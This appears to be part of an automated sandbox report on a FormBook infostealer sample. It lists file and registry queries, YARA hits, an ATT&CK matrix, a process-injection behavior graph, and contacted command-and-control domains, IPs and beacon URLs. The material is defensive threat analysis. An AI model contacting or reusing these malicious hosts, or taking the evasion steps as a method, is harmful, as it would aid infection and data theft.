            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match | File source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected FormBook
            Source: Yara match | File source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph

            Behavior Graph ID: 491384 | Sample: z7d1ehQQQW.exe | Startdate: 27/09/2021 | Architecture: WINDOWS | Score: 100

            Graph nodes and edges (process tree, contacted hosts and signatures per node):

            • Start (node 2): DNS/IP www.healthyweathorganics.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 8 other signatures; started z7d1ehQQQW.exe (node 11)
            • z7d1ehQQQW.exe 3 (node 11): dropped C:\Users\user\AppData\...\z7d1ehQQQW.exe.log (ASCII); signatures: Tries to detect virtualization through RDTSC time measurements, Injects a PE file into a foreign processes; started z7d1ehQQQW.exe (node 15)
            • z7d1ehQQQW.exe (node 15): signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, Queues an APC in another process (thread injection); injected explorer.exe (node 18)
            • explorer.exe (node 18, injected): DNS/IP www.noseainsight.com, www.dorotajedrusik.com, 5 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit); started cscript.exe (node 22)
            • cscript.exe (node 22): signatures: Self deletion via cmd delete, Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements; started cmd.exe (node 25)
            • cmd.exe 1 (node 25): started conhost.exe (node 27)


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            z7d1ehQQQW.exe | 25% | Virustotal |
            z7d1ehQQQW.exe | 13% | ReversingLabs | Win32.Trojan.Pwsx

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            5.2.z7d1ehQQQW.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            Source | Detection | Scanner | Label
            td-balancer-euw2-6-109.wixdns.net | 0% | Virustotal |
            noseainsight.com | 5% | Virustotal |

            URLs

            Source | Detection | Scanner | Label
            http://www.urwpp.deold | 0% | Avira URL Cloud | safe
            http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
            http://www.tiro.com | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn; | 0% | Avira URL Cloud | safe
            http://www.goodfont.co.kr | 0% | URL Reputation | safe
            http://www.carterandcone.com | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/-czt | 0% | Avira URL Cloud | safe
            http://www.sajatypeworks.com | 0% | URL Reputation | safe
            http://www.typography.netD | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
            http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
            http://fontfabrik.com | 0% | URL Reputation | safe
            http://www.founder.com.cn/cnp | 0% | URL Reputation | safe
            http://www.noseainsight.com/cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 | 100% | Avira URL Cloud | malware
            http://www.jiyu-kobo.co.jp/1 | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/jp/f | 0% | Avira URL Cloud | safe
            www.odysseysailingsantorini.com/cmsr/ | 0% | Avira URL Cloud | safe
            http://www.jiyu-kobo.co.jp/s-1 | 0% | Avira URL Cloud | safe
            http://www.carterandcone.comw.c | 0% | Avira URL Cloud | safe
            http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
            http://www.ascendercorp.com/typedesigners.html | 0% | URL Reputation | safe
            https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWd | 0% | Avira URL Cloud | safe
            http://www.sandoll.co.kr | 0% | URL Reputation | safe
            http://www.urwpp.deDPlease | 0% | URL Reputation | safe
            http://www.urwpp.de | 0% | URL Reputation | safe
            http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
            http://www.sakkal.com | 0% | URL Reputation | safe
            http://www.fontbureau.co | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/G | 0% | URL Reputation | safe
            http://www.urwpp.deF | 0% | URL Reputation | safe
            http://www.carterandcone.comn-uL | 0% | Avira URL Cloud | safe
            http://www.tiro.comlic | 0% | URL Reputation | safe
            http://www.carterandcone.comCe | 0% | Avira URL Cloud | safe
            http://www.carterandcone.comt | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
            http://www.carterandcone.coml | 0% | URL Reputation | safe
            http://www.dorotajedrusik.com/cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad | 0% | Avira URL Cloud | safe
            http://www.founder.com.cn/cn | 0% | URL Reputation | safe
            http://www.monotype. | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/i | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/f | 0% | URL Reputation | safe
            http://www.tiro.com0K | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | | unknown
            noseainsight.com | 34.102.136.180 | true | false | | unknown
            www.healthyweathorganics.com | 47.91.170.222 | true | true | | unknown
            www.dorotajedrusik.com | unknown | unknown | true | | unknown
            www.noseainsight.com | unknown | unknown | true | | unknown

                  Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://www.noseainsight.com/cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 | false | Avira URL Cloud: malware | unknown
            www.odysseysailingsantorini.com/cmsr/ | true | Avira URL Cloud: safe | low
            http://www.dorotajedrusik.com/cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad | false | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.urwpp.deold | z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.fontbureau.com/designersG | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | | high
            http://www.fontbureau.com/designers/? | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | | high
            http://www.founder.com.cn/cn/bThe | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.com/designers? | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | | high
            http://www.fontbureau.com/designersW | z7d1ehQQQW.exe, 00000000.00000003.659553696.0000000005B00000.00000004.00000001.sdmp | false | | high
            http://www.tiro.com | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cn; | z7d1ehQQQW.exe, 00000000.00000003.654997513.0000000005AFE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.fontbureau.com/designers | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.664218437.0000000005B00000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658968542.0000000005AFF000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.657880283.0000000005AFE000.00000004.00000001.sdmp | false | | high
            http://www.fontbureau.com/designers/O | z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmp | false | | high
            http://www.goodfont.co.kr | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.carterandcone.com | z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.com/designerses-es_tradnl; | z7d1ehQQQW.exe, 00000000.00000003.657817317.0000000005AFE000.00000004.00000001.sdmp | false | | high
            http://www.jiyu-kobo.co.jp/-czt | z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.sajatypeworks.com | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.typography.netD | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cn/cThe | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.galapagosdesign.com/staff/dennis.htm | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.661245659.0000000005B00000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://fontfabrik.com | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cnp | z7d1ehQQQW.exe, 00000000.00000003.654997513.0000000005AFE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.jiyu-kobo.co.jp/1 | z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.jiyu-kobo.co.jp/jp/f | z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.jiyu-kobo.co.jp/s-1 | z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.fontbureau.com/designers/frere-user.htmlO | z7d1ehQQQW.exe, 00000000.00000003.658881250.0000000005AFF000.00000004.00000001.sdmp | false | | high
            http://www.fontbureau.com/designersd | z7d1ehQQQW.exe, 00000000.00000003.657764912.0000000005AFE000.00000004.00000001.sdmp | false | | high
            http://www.carterandcone.comw.c | z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.galapagosdesign.com/DPlease | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.ascendercorp.com/typedesigners.html | z7d1ehQQQW.exe, 00000000.00000003.656320601.0000000005AFE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWd | cscript.exe, 00000009.00000002.918829235.00000000052AF000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.fonts.com | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | | high
            http://www.sandoll.co.kr | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.urwpp.deDPlease | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.urwpp.de | z7d1ehQQQW.exe, 00000000.00000003.660250458.0000000005B00000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.zhongyicts.com.cn | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.sakkal.com | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.656667821.0000000005AFE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.com/designersn | z7d1ehQQQW.exe, 00000000.00000003.660082867.0000000005B00000.00000004.00000001.sdmp | false | | high
            http://www.fontbureau.com/designers2I | z7d1ehQQQW.exe, 00000000.00000003.660117823.0000000005B00000.00000004.00000001.sdmp | false | | high
            http://www.apache.org/licenses/LICENSE-2.0 | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | | high
            http://www.fontbureau.com | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | | high
            http://www.fontbureau.co | z7d1ehQQQW.exe, 00000000.00000003.659128745.0000000005AFF000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.jiyu-kobo.co.jp/G | z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.urwpp.deF | z7d1ehQQQW.exe, 00000000.00000003.657537776.0000000005AFE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.carterandcone.comn-uL | z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.tiro.comlic | z7d1ehQQQW.exe, 00000000.00000003.655730815.0000000005B00000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.carterandcone.comCe | z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.carterandcone.comt | z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.jiyu-kobo.co.jp/jp/ | z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.carterandcone.coml | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.com/designers/cabarga.htmlN | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | | high
            http://www.founder.com.cn/cn | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.com/designers/frere-user.html | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658933536.0000000005AFF000.00000004.00000001.sdmp | false | | high
            http://www.fontbureau.com/designers/cabarga.html | z7d1ehQQQW.exe, 00000000.00000003.659434113.0000000005B00000.00000004.00000001.sdmp | false | | high
            http://www.monotype. | z7d1ehQQQW.exe, 00000000.00000003.657056723.0000000005AFE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
